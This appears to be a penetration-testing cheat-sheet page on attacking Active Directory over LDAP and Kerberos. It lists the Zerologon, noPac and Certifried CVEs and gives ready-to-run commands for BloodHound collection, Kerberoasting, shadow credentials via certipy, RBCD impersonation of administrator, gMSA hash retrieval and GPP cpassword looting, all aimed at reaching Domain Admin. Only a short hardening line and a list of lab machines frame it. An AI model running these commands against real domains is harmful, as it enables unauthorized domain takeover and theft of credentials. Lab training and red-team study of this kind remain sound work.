KagisoSec_
Service bank
DIRECTORY / AD 88/tcp 389/tcp 636/tcp 3268/tcp

Active Directory / LDAP

aka LDAP, AD, Domain Controller

The Windows directory exposed over LDAP (389/636) and the GC (3268). Map it with BloodHound, then abuse ACLs, Kerberos roasting, and delegation to walk to Domain Admin.

windows active-directory ldap kerberos

Ports

PortProtoNotes
88tcpKerberos (DC indicator)
389tcpLDAP
636tcpLDAPS
3268tcpGlobal Catalog

Fingerprint

  • 88 + 389 + 445 open together means a Domain Controller
  • LDAP/SMB leak the domain name and naming context

Key files

PathHoldsSensitive
NTDS.dit the AD database, all domain hashes (DCSync / volume shadow copy) sensitive
user description / info attributes admins sometimes store passwords here sensitive
SYSVOL scripts and GPP logon scripts and cpassword secrets sensitive

Known CVEs

CVEImpact
CVE-2020-1472Zerologon, instant DC compromise
CVE-2021-42278/42287noPac, privilege escalation to DA
CVE-2022-26923Certifried, machine account to DA via ADCS

Exploitation primitives

  • BloodHound (bloodhound-python / SharpHound) to map attack paths and ACLs
  • Kerberoast SPN accounts and AS-REP roast accounts without preauth, then crack offline
  • ACL abuse: GenericAll / GenericWrite / WriteDACL, shadow credentials (msDS-KeyCredentialLink), RBCD
  • DCSync with replication rights; check ms-DS-MachineAccountQuota for computer-account creation

Overview

A Domain Controller advertises itself with Kerberos (88), LDAP (389) and SMB (445) together. With any domain credential, collect the graph and let BloodHound show you the shortest path to Domain Admin.

Enumeration

Enumerate users over LDAP:

nxc ldap <TARGET> -u user -p pass --users

LDAP search for accounts:

ldapsearch -x -H ldap://<TARGET> -D 'DOM\user' -w pass -b 'DC=dom,DC=local' '(samaccountname=*)'

Collect the BloodHound graph:

bloodhound-python -u user -p pass -d dom.local -ns <TARGET> -c All

Common moves

  • Roast: GetUserSPNs.py (kerberoast), GetNPUsers.py (AS-REP).
  • Abuse the edge BloodHound flags (GenericAll, WriteDACL, etc.).
  • Check info/description attributes for stashed passwords.

Shadow Credentials (GenericWrite / AddKeyCredentialLink)

Add a key to the target’s msDS-KeyCredentialLink, then PKINIT for its hash:

certipy shadow auto -u user@dom.local -p pass -account 'victim$' -dc-ip <TARGET>

Resource-Based Constrained Delegation (RBCD)

With write over a computer object, set yourself as allowed-to-delegate, then impersonate:

rbcd.py -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write -dc-ip <TARGET> dom.local/user:pass
getST.py -spn cifs/target.dom.local -impersonate administrator dom.local/'EVILPC$':pass

Read a gMSA password

Members of the gMSA’s PrincipalsAllowedToRetrieve can pull its NT hash:

nxc ldap <TARGET> -u user -p pass --gmsa

Loot SYSVOL (GPP cpassword)

nxc smb <TARGET> -u user -p pass -M gpp_password

Hardening

Tier admin accounts, enforce strong service-account passwords, monitor ACL changes, and patch the DC takeover CVEs.

Seen on these machines 10

Administrator Authority Ghost Redelegate StreamIO TombWatcher Voleur VulnCicada

References